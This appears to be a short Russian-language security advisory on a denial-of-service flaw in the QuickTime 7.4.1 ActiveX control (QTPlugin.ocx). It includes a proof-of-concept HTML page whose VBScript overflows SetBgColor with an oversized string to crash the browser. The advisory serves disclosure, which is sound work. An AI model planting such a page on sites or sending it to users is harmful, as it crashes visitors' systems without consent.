Программа: QuickTime 7.4.1

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных в QTPlugin.ocx в функциях SetBgColor, SetHREF, SetMovieName, SetTarget, SetMatrix. Атакующий может обманным образом заманить пользователя на специально составленный сайт, что приведет к переполнению стека и отказу системы в обслуживании.

Пример:

<html>
<object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B' id='foo' >
</object>
<input type="button" value="Hit me" language="VBScript" OnClick="test()">
<script language="VBScript">
sub test()
bar = String(515305, "A")
foo.SetBgColor bar
End Sub
</script>
</html>



Оставить мнение